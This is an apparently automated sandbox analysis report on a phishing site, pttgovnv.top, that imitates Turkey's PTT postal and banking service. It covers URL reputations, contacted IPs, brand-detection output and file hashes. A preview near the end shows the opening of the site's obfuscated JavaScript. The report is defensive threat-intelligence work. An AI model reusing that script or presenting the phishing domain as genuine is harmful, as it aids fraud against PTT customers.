          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPj7&sid=Jgob5dOCMvYo_mojBQURfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liR2r&sid=HHxSQQKw-ZFDRlk7BQUUfalse
          • Avira URL Cloud: phishing
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://stats.g.doubleclick.net/g/collectchromecache_311.2.dr, chromecache_278.2.drfalse
          • URL Reputation: safe
          unknown
          http://creativecommons.org/licenses/by/3.0/chromecache_198.2.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://service-edge.alo-tech.com/static/images/chat-icon.svgchromecache_273.2.drfalse
          • Avira URL Cloud: safe
          unknown
          https://fontawesome.comchromecache_232.2.dr, chromecache_258.2.drfalse
          • URL Reputation: safe
          unknown
          http://www.opensource.org/licenses/mit-license.phpchromecache_241.2.drfalse
          • URL Reputation: safe
          unknown
          http://twitter.com/fontawesome.chromecache_198.2.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://getbootstrap.com)chromecache_313.2.dr, chromecache_241.2.dr, chromecache_312.2.dr, chromecache_175.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://kyruus.comchromecache_198.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://ianlunn.co.uk/chromecache_241.2.drfalse
          • Avira URL Cloud: safe
          unknown
          https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_313.2.dr, chromecache_241.2.drfalse
          • Avira URL Cloud: safe
          unknown
          https://github.com/IanLunn/Hoverchromecache_241.2.drfalse
          • Avira URL Cloud: safe
          unknown
          https://i.pinimg.com/originals/59/55/6a/59556a0f715ae387ae807f4fda9f7f97.png)chromecache_329.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://www.dardenstudio.com/http://www.dardenstudio.com/http://typekit.com/eulas/0000000000000000000chromecache_339.2.drfalse
          • Avira URL Cloud: safe
          unknown
          https://ismail-develop.alo-tech.com/v2/tr/images/more_vert.svgchromecache_273.2.drfalse
          • Avira URL Cloud: safe
          unknown
          https://fontawesome.com/license/freechromecache_232.2.dr, chromecache_258.2.drfalse
          • URL Reputation: safe
          unknown
          http://daneden.me/animatechromecache_241.2.drfalse
          • URL Reputation: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          104.21.47.250
          unknownUnited States
          13335CLOUDFLARENETUSfalse
          104.18.10.207
          netdna.bootstrapcdn.comUnited States
          13335CLOUDFLARENETUSfalse
          34.107.233.18
          chat-server.alo-tech.comUnited States
          15169GOOGLEUSfalse
          172.67.174.217
          pttgovnv.topUnited States
          13335CLOUDFLARENETUSfalse
          142.250.185.132
          www.google.comUnited States
          15169GOOGLEUSfalse
          185.220.152.26
          www.ptt.gov.trTurkey
          205335ASN_PTTTRfalse
          35.201.78.44
          lb-p3.alo-tech.comUnited States
          15169GOOGLEUSfalse
          239.255.255.250
          unknownReserved
          unknownunknownfalse
          35.190.80.1
          a.nel.cloudflare.comUnited States
          15169GOOGLEUSfalse
          IP
          192.168.2.4
          192.168.2.6
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1502512
          Start date and time:2024-09-02 00:24:16 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 3m 58s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:browseurl.jbs
          Sample URL:https://pttgovnv.top/help/
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:9
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal68.phis.win@25/305@32/11
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Browse: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
          • Browse: https://www.ptt.gov.tr/Sayfalar/Posta/PulVeFilateliUst.aspx
          • Browse: https://www.ptt.gov.tr/Sayfalar/Kargo/PttYurtIciKargoHizmetleri.aspx
          • Browse: https://www.ptt.gov.tr/Sayfalar/Kargo/PttYurtDisiKargoHizmetleriUst.aspx
          • Browse: https://www.ptt.gov.tr/Sayfalar/Posta/UETS.aspx
          • Browse: https://www.ptt.gov.tr/Sayfalar/Kargo/AmbalajHizmetleri.aspx
          • Browse: https://www.ptt.gov.tr/Sayfalar/Banka/PttKartPttMatikUst.aspx
          • Browse: https://www.ptt.gov.tr/Sayfalar/Posta/KayitliElektronikPosta.aspx
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 142.250.186.142, 216.58.206.35, 64.233.184.84, 34.104.35.123, 20.114.59.183, 199.232.214.172, 192.229.221.95, 20.242.39.171, 13.85.23.206, 142.250.74.200, 142.250.186.138, 172.217.23.106, 142.250.186.106, 142.250.186.74, 142.250.181.234, 142.250.184.234, 216.58.212.138, 172.217.18.106, 172.217.16.138, 142.250.185.106, 142.250.185.234, 142.250.185.202, 142.250.185.74, 142.250.186.170, 142.250.185.170, 142.250.185.138, 142.250.185.200, 142.250.181.238, 142.250.181.227, 142.250.185.195
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, fonts.gstatic.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.google-analytics.com
          • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing network information.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          No simulations
          InputOutput
          URL: https://pttgovnv.top/help/ Model: jbxai
          {
          "brand":["lojistik",
          "kurumsal",
          "posta",
          "banka",
          "argo",
          "online islemciler"],
          "contains_trigger_text":false,
          "prominent_button_name":"unknown",
          "text_input_field_labels":["unknown"],
          "pdf_icon_visible":false,
          "has_visible_captcha":false,
          "has_urgent_text":false,
          "has_visible_qrcode":false}
          URL: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx Model: jbxai
          {
          "brand":["Ptt",
          "TURKME yuzYILl",
          "Ptt Kep",
          "T.C. Posta ve Telgraf Teikilatl",
          "Esnaf Arad",
          "HGS",
          "Bizi Sosyal Medya Platformlarl",
          "Ptt Sigorta",
          "PttCell",
          "Ptt Online islemler",
          "Faydall Baglantllar",
          "Haber ve Duyuru B.lteni",
          "T.C. Posta ve TelgrafT%kilatl",
          "Tarifeler",
          "en son haber ve PTTBank internet Bankacll.gl",
          "PttAvm",
          "duyurularl an[lk ola ra k sizinle",
          "Gizlilik",
          "Misyanumuz: Posta,
           kargo ve payla#lyoruz",
          "Posta Geki Hesap Bildirimi bankaclllk alaninda,
           toplumsal Yasal Uyarllar interaktif kargo/Posta sorumluluk bilinci ile kaliteli ve E-Posta adresinizi girin ekonomik hizmetler sunarak musteri Sikca Sorulan Sorular kayltll Elektronik Posta (kEP) memnuniyet"]}
          URL: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx Model: jbxai
          {
          "brand":["Ptt183",
          "TURKME yuzYILl",
          "Ptt Kep",
          "T.C. Posta ve Telgraf Teikilatl",
          "Esnaf Arad",
          "HGS",
          "Bizi Sosyal Medya Platformlarl.zerindcn Takip Edin",
          "Ptt Sigorta",
          "PttCell",
          "Ptt Online islemler",
          "Faydall Baglantllar",
          "Haber ve Duyuru B.lteni",
          "T.C. Posta ve TelgrafT%kilatl",
          "Tarifeler",
          "en son haber ve PTTBank internet Bankacll.gl",
          "PttAvm",
          "duyurularl an[lk ola ra k sizinle",
          "Gizlilik",
          "Misyanumuz: Posta,
           kargo ve payla#lyoruz",
          "Posta Geki Hesap Bildirimi bankaclllk alaninda,
           toplumsal Yasal Uyarllar interaktif kargo/Posta sorumluluk bilinci ile kaliteli ve E-Posta adresinizi girin ekonomik hizmetler sunarak musteri Sikca Sorulan Sorular kayltll Elektronik Post"]}
          URL: https://pttgovnv.top/help/ Model: jbxai
          {
          "brand":["lojistik",
          "kurumsal",
          "posta",
          "banka",
          "argo",
          "online islemciler"],
          "contains_trigger_text":false,
          "prominent_button_name":"unknown",
          "text_input_field_labels":["unknown"],
          "pdf_icon_visible":false,
          "has_visible_captcha":false,
          "has_urgent_text":false,
          "has_visible_qrcode":false}
          URL: https://www.ptt.gov.tr/Sayfalar/Banka/PttKartPttMatikUst.aspx Model: jbxai
          {
          "brand":["Ptt",
          "T.C. Posta ve Telgraf Tekilat",
          "Ptt Kep",
          "Ptt",
          "Ptt Online islemler",
          "Ptt Sigorta",
          "PttCell",
          "Ptt Avm"],
          "contains_trigger_text":false,
          "prominent_button_name":"ABONE OL",
          "text_input_field_labels":["unknown"],
          "pdf_icon_visible":false,
          "has_visible_captcha":false,
          "has_urgent_text":false,
          "has_visible_qrcode":false}
          No context
          No context
          No context
          No context
          No context
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:SVG Scalable Vector Graphics image
          Category:downloaded
          Size (bytes):1878
          Entropy (8bit):5.099221191787203
          Encrypted:false
          SSDEEP:24:t4LE1XD/D1rHxmS2CHGFCt0u9cLp/NW5Aj5AfCJCDh2GhbIL82Nsd8xbpTGPjehh:+6XjlHoS2CmYoXWNbAx5p0KyD0l
          MD5:B441F960B07A4EC1688F2EDB043F767A
          SHA1:848D59D73CC5324CD222CE97D6FFD48FF7D8021F
          SHA-256:9160F6D5855A884D542A3DE24B58E892616D74CFA9BDD9816C209350003EB71D
          SHA-512:133D9616277EF27F0430DCB5E7D1D5C2023D2BBE8AB06B286B2F8B395B85DE2B6E330779F6906672860C660000C080E46D0F7F1CAB8CD5E036415708F1C06607
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/img/down_button.svg
          Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="54" height="54" viewBox="0 0 54 54">.. <defs>.. <filter id="Ellipse_369" x="0" y="0" width="54" height="54" filterUnits="userSpaceOnUse">.. <feOffset dy="3" input="SourceAlpha"/>.. <feGaussianBlur stdDeviation="3" result="blur"/>.. <feFlood flood-color="#2c2828" flood-opacity="0.259"/>.. <feComposite operator="in" in2="blur"/>.. <feComposite in="SourceGraphic"/>.. </filter>.. <clipPath id="clip-path">.. <rect width="8" height="14" fill="none"/>.. </clipPath>.. </defs>.. <g id="Group_11280" data-name="Group 11280" transform="translate(604 -1140) rotate(90)">.. <g id="Group_140" data-name="Group 140" transform="translate(1146 559)">.. <g transform="matrix(0, -1, 1, 0, -6, 45)" filter="url(#Ellipse_369)">.. <g id="Ellipse_369-2" data-name="Ellipse 369" transform="translate(45 6) rotate(90)" fill="#fff" stroke="rgba(136,152,170,0.5)" stroke-w
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (4005)
          Category:downloaded
          Size (bytes):4436
          Entropy (8bit):5.598657081005046
          Encrypted:false
          SSDEEP:96:n/EKhN5jG91m+Lu1ur64EJD0l3cyvp9n1iI+ZM67IB+RvUCFa:/EKhK91mkUX4EJD8r9nUL7IB+RcQa
          MD5:D940AFE8635CC3409F9E3AE7EA0518CD
          SHA1:4DF3E545964A46C46A204E2B072C7FCF4BC2FA7B
          SHA-256:49D6396A823560D47584B60E9A88A2374F87A02626F8ED2DBCFAC29885651197
          SHA-512:B21A7807DB9FACD47DF2A2629E15EB127022F0107FC651C13578505E5737BB64D1F2D8C85135730879EC739838049AFEB42DD21CFB13B8A27FEE4AF5F137B79B
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/js/langcodes.min.js
          Preview:var acjsLanguagesList={"af":"Afrikaans","sq":"Albanian - shqip","am":"Amharic - ....","ar":"Arabic - .......","an":"Aragonese - aragon.s","hy":"Armenian - .......","ast":"Asturian - asturianu","az":"Azerbaijani - az.rbaycan dili","eu":"Basque - euskara","be":"Belarusian - ..........","bn":"Bengali - .....","bs":"Bosnian - bosanski","br":"Breton - brezhoneg","bg":"Bulgarian - .........","ca":"Catalan - catal.","ckb":"Central Kurdish - ..... (........ ......)","zh":"Chinese - ..","zh-HK":"Chinese (Hong Kong) - ......","zh-CN":"Chinese (Simplified) - ......","zh-TW":"Chinese (Traditional) - ......","co":"Corsican","hr":"Croatian - hrvatski","cs":"Czech - .e.tina","da":"Danish - dansk","nl":"Dutch - Nederlands","en":"English","en-AU":"English (Australia)","en-CA":"English (Canada)","en-IN":"English (India)","en-NZ":"English (New Zealand)","en-ZA":"English (South Africa)","en-G
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (32033)
          Category:downloaded
          Size (bytes):37045
          Entropy (8bit):5.174934618594778
          Encrypted:false
          SSDEEP:768:o2rGy27UwlNqMl95qNmCFejhqs8snmi+CSFXfbx8Gf3Zq7Q:Jg73zhq0GvbJ3ZKQ
          MD5:5869C96CC8F19086AEE625D670D741F9
          SHA1:430A443D74830FE9BE26EFCA431F448C1B3740F9
          SHA-256:53964478A7C634E8DAD34ECC303DD8048D00DCE4993906DE1BACF67F663486EF
          SHA-512:8B3B64A1BB2F9E329F02D4CD7479065630184EBAED942EE61A9FF9E1CE34C28C0EECB854458977815CF3704A8697FA8A5D096D2761F032B74B70D51DA3E37F45
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/bootstrap/js/bootstrap.min.js
          Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with no line terminators
          Category:downloaded
          Size (bytes):136
          Entropy (8bit):5.00666710239018
          Encrypted:false
          SSDEEP:3:InjZoSzunSTzGeCmzthrNQDv1GnT1KUnIbjEREkk2h4CEj:8ZoS6STz3bNNQ4nTA+IbjEEWEj
          MD5:D20B36E8AC57810380AEF8DCC7736C36
          SHA1:98F2BE7A337FD40153553D6208ED686B0382626C
          SHA-256:0B89CC2AC78747D8C7640C9E9756E83E4E61572B52AD0CD94F3182F71373A397
          SHA-512:D60354D79CE9E35650E6EA64A15A41C976E6471BBF8D860E2F2958B22AF93A57F03CB97AC21A91533050CB4F5D1752C389A48DD911B9087AC4FA63DAB2BDC035
          Malicious:false
          Reputation:low
          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISLAk4C7nXvQYn6RIFDZFhlU4SBQ2UVPrPEgUN6h8j9hIFDXRlOh4SBQ1wYBmoEhAJ0TBeD4r0xmwSBQ2RYZVOEhAJMmJ6A2-tyi8SBQ2UVPrPEhAJleSPaj2k45sSBQ3qHyP2EhcJAsivaDEjD_cSBQ10ZToeEgUNcGAZqA==?alt=proto
          Preview:Ci0KBw2RYZVOGgAKBw2UVPrPGgAKBw3qHyP2GgAKBw10ZToeGgAKBw1wYBmoGgAKCQoHDZFhlU4aAAoJCgcNlFT6zxoACgkKBw3qHyP2GgAKEgoHDXRlOh4aAAoHDXBgGagaAA==
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (56890)
          Category:dropped
          Size (bytes):56940
          Entropy (8bit):5.647778850919549
          Encrypted:false
          SSDEEP:768:P+jYxCLAGCGYW/PpFbRJYRC8RNKlQMc8s/VhTP4TqCE55N0kz35AJWgN:P+jLACLn3/IRNX9VPp3MWgN
          MD5:B7A046C7B867F6E1F65FF7F0D87C8F46
          SHA1:295730746B4CE11B43690A8ECA26475E159507A0
          SHA-256:4867273879CF0C570E685E2461EB392965A77BF2CB57B9EA56F1F6B42BD6C8EF
          SHA-512:BCF750B30FABE7B1A4A14114FE46818AB43A84585CC705C6C1AB535DFD8C1B7CA0F28DF794CC2A54632EC405A37BA0C7659D15A7BBECCDC4F1850032ABF37BC2
          Malicious:false
          Reputation:low
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4110],{1295:function(e,n){"use strict";n.Z={src:"/_next/static/media/no-image.77f0b5fb.jpg",height:300,width:500,blurDataURL:"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAoKCgoKCgsMDAsPEA4QDxYUExMUFiIYGhgaGCIzICUgICUgMy03LCksNy1RQDg4QFFeT0pPXnFlZXGPiI+7u/sBCgoKCgoKCwwMCw8QDhAPFhQTExQWIhgaGBoYIjMgJSAgJSAzLTcsKSw3LVFAODhAUV5PSk9ecWVlcY+Ij7u7+//CABEIAAUACAMBIgACEQEDEQH/xAAoAAEBAAAAAAAAAAAAAAAAAAAABwEBAQAAAAAAAAAAAAAAAAAAAAH/2gAMAwEAAhADEAAAALAI/8QAGxAAAgEFAAAAAAAAAAAAAAAAAQIAAxETITH/2gAIAQEAAT8AFN1a2Z230z//xAAVEQEBAAAAAAAAAAAAAAAAAAAAEf/aAAgBAgEBPwCP/8QAFREBAQAAAAAAAAAAAAAAAAAAABH/2gAIAQMBAT8Ar//Z"}},8196:function(e,n,t){"use strict";t.d(n,{Z:function(){return O}});var s=t(8565),r=t.n(s),a=t(3288),i=t(2466),l=t(3395),c=t(2260),o=t.n(c),u=t(8082),d=t(2718),h=t(3230),f=t(9792),p=t(1011),_=t(8810),y=t(6731),m=t.n(y);function v(e,n){(null==n||n>e.length)&&(n=e.length);for(var t=0,s=new Array(n);t<n;t++)s[t]=e[t];return s}fun
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows icon resource - 1 icon, 32x19, 32 bits/pixel
          Category:downloaded
          Size (bytes):2570
          Entropy (8bit):3.527155255496045
          Encrypted:false
          SSDEEP:24:06baFI5vY0u68gsGOLynrZFTWxBtwJGwPBheAuaAxI4l60O+9DL:0h8vo6jZOsrZFyEJGwPBh7uve4llOwP
          MD5:14EE76D740C6D351E447C37B1A9DDB37
          SHA1:CDD7D04160D5624C219CCB8FD2D4F557D77DB99B
          SHA-256:32EF97D69F5188DF3EB8BCA51E02A151FFB615E21FA0E4EABFA884CDD4DB0485
          SHA-512:66945FA193F2E3B94A35FC4C5AA6F19321B3F832BB0491B70A1787C12CB6B5A25E7D591D9FE33827883934A3DB3808BDDC64898B16ED824244AA15EE86351817
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/favicon.ico
          Preview:...... ..... .........(... ...&..... .........#...#.................................................$..V..r..`..5..............?..Z..d..Z..=..........................................................T........p..,........ ..f.............................1.......................................r........w..........."..............E.................A........|............................f...........(...........\........s................................W......................../...........].......................5......................................e...A...Y.................Q...........7.......................&..............................................&..............t.....q...........0..............y........:.................................................!...O......8........,.................:........A....
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):15414
          Entropy (8bit):7.802234231177533
          Encrypted:false
          SSDEEP:384:o5uVjKZV0gFJcwDUs0uZEsODybond41ShLNDCfZ8TcQc8S:guVjKbcwDnqsODysndISzDaiJS
          MD5:37B5D4B2CE91DDFC037F3172C9A54549
          SHA1:C463FB17563D029985E7E89487ADD1EF1560F8E0
          SHA-256:8C0DF3DA867E9D1F84C96E7CD38B654DD053108EC72C6E25A701A71603374524
          SHA-512:15EC6031EBE54A1D3B14202CAF66A5E09153829819B50C85AABE7DAB0E6C3D764D9EBAFAD25FF6AA6B82B5CC79178F695DBFE38DB27474D319553D6A72C4E091
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/37.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..;.IDATx...m.+.}.....D.R.b)...d..2y..h.:.-..p.^......r./.;....(I{y.'6.6..q..{...`8.xQ7}."..7...F$G.,n.9v"W\[.l.2;...v.......a........y..9g........j.K.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.....8.........q... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... ..........B....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B...k..J..V.+)..@..W.{.w.?.^]}u.W...N.S.u...C..%.PF..R...QQ..V...{....nxkz.M}.@....z..!...
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):68155
          Entropy (8bit):7.976328915331773
          Encrypted:false
          SSDEEP:1536:Psws3e4vQs5asznNtA2jZXiM1zGLvwTFXa6Ad1HgK6d3bzAGCNGVJVJVGj:EAYTBT1iLYTFXa1dtp6dr6
          MD5:3AF1FB65D2985042EC15BAF2A68EDEFD
          SHA1:DCFF4DCD6389FAB17DAEA641FA37F06CE1646FE9
          SHA-256:C80A4608064847A85102440DBBFF50BB92EE57055DCEA38B23B8FDC33AFA6830
          SHA-512:98E8CA2E55BC1D057F81E200E710A6BF36D20509612CD310E79A206F7A72F483C7FC07FF9C74D06DC9BD5E0BD92BA8039080E998D452F6D791CB120F908FBF75
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/53.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<....IDATx........wf...88@......c..{.l..Q..MbL4.h,1**.(....+*...H...p....y..3...*$...K.m.....7..O#.1@..A..A._8....A..AP.!.. .. (...A..A..q.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..8.A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..A.. .. ....C..A..AP.!.. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..8.A..A..E.. .. ..".A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..AP.!.. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..".A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..A.. .. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..8.A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..A.. .. ....C..A..AP.!.. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. ..
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):30380
          Entropy (8bit):7.86681636831563
          Encrypted:false
          SSDEEP:768:sVJVGfvVGfBG/GfBGpAbd2hqWRR2i6c8/Alm1nW7d482ZwNTDdtIPrOzj:sVJVGfvVGfBG/GfBGpAQUWRhB84Q1GDP
          MD5:BFE1E0B8D54C3BE365553A5643298493
          SHA1:66B3E9FCD7C541DB4E56BAB4F75ED8A3DF93E872
          SHA-256:D811034E3AA4C50A5B95C86066670B838725976A41B7F1BCBACB6F307648F6C2
          SHA-512:ADC45C69526A06781B4BC0267DD0E567C767665A6572FF47856277A9E5EA8F9704424B2913F7A2DC190E9EAB395681C7027783016FA08B1463383049874ADA2C
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..v9IDATx...|..............N..}.......V...j.om.o..._k[.}...W[h.j].}.}'@ ...$$!.~.;.......=.....8...9s...o....DQ$......w.A......@........8.................... .......D......D...............q......q......"......@........8......8............. ...... .......D......................q......"......"......@........8.................... .......D......D...............q......q......"......@......@........8............. ...... .......D......................q......"......"......@........8......8.8......8............. ...... .......D......................q......"......"......@........8.................... .......D......D...............q......q......"......@......@........8............. ...... .......D......................q......"......"......@........8......8............. .......D......D...............q......q......"......@......@........8............................. .......D......D...............q...
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (65482), with no line terminators
          Category:downloaded
          Size (bytes):112550
          Entropy (8bit):5.311884237132668
          Encrypted:false
          SSDEEP:3072:P/OLp3mvR71BPJJipknKTfLswZA4u1ZHA0Yr+4UuKcOHUPHbbcAnK:P/OLNmvR71BPJJip1TfYwZA4u1ZHA0EA
          MD5:9D404836256B5CCA87EC2DD4E6C5B851
          SHA1:2E8C690AD11ADC6A062B6275508D9DE3DE50E96F
          SHA-256:0A692D8595918A8DE18443C98340B61F39B25C3F66C53C28BED94FF18B7E6EC0
          SHA-512:BB9E2EAA4C4FCC6274E0BB0EBC76318EDB828184C0172C98B1DEB049D6E8862F28DD26B4AFAA4ADAF4C7C4D0CFBC7FA1D610C2ACBD3D598F3025ACF91B775D13
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/0e738ae1JxKnW.js
          Preview:const a1_0x54146a=a1_0x1a33;(function(_0x15019a,_0x4bd1ef){const _0x4ad14f=a1_0x1a33,_0x4f09df=_0x15019a();while(!![]){try{const _0x23aed6=parseInt(_0x4ad14f(0x1c0))/0x1*(-parseInt(_0x4ad14f(0x1d2))/0x2)+-parseInt(_0x4ad14f(0x1e1))/0x3*(parseInt(_0x4ad14f(0x291))/0x4)+parseInt(_0x4ad14f(0x150))/0x5+parseInt(_0x4ad14f(0x2d1))/0x6+-parseInt(_0x4ad14f(0x2a6))/0x7+-parseInt(_0x4ad14f(0x13a))/0x8+parseInt(_0x4ad14f(0x1d0))/0x9;if(_0x23aed6===_0x4bd1ef)break;else _0x4f09df['push'](_0x4f09df['shift']());}catch(_0x753273){_0x4f09df['push'](_0x4f09df['shift']());}}}(a1_0x1319,0x6eb50));const a1_0x243f17=(function(){let _0x2d03c3=!![];return function(_0x7dff9c,_0x52e3c8){const _0x3d297c=_0x2d03c3?function(){const _0x153071=a1_0x1a33;if(_0x52e3c8){const _0x33276f=_0x52e3c8[_0x153071(0x36d)](_0x7dff9c,arguments);return _0x52e3c8=null,_0x33276f;}}:function(){};return _0x2d03c3=![],_0x3d297c;};}()),a1_0x454d09=a1_0x243f17(this,function(){const _0x52e53d=a1_0x1a33;return a1_0x454d09[_0x52e53d(0x1c2)]
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Web Open Font Format, TrueType, length 63712, version 1.0
          Category:downloaded
          Size (bytes):63712
          Entropy (8bit):7.991584066717122
          Encrypted:true
          SSDEEP:1536:6r3aBF+fpuQfwBx/Qyz72z/liawnC4HcIzpnvQ3PXg:IKBAfp4/QyzSz/RwC4b8I
          MD5:AC327C4DB6284EF64EBE872B6308F5DA
          SHA1:7DD17593D3947F4EA10BE937634EF8F553443E5A
          SHA-256:2E1587380141DAFF4E10A8E3DB8F7AE5887102AB7576BFF43049590F637AC20B
          SHA-512:8DA7EC2B5617B1ECF2699573FEE9A43B8CCB111BA12B22E35CD0621C85377890675D3FFBBBF11AAA828F9D00302DE06CB1680B750370571C80DAAEC65BE36A8B
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/2e158738kFGym.woff
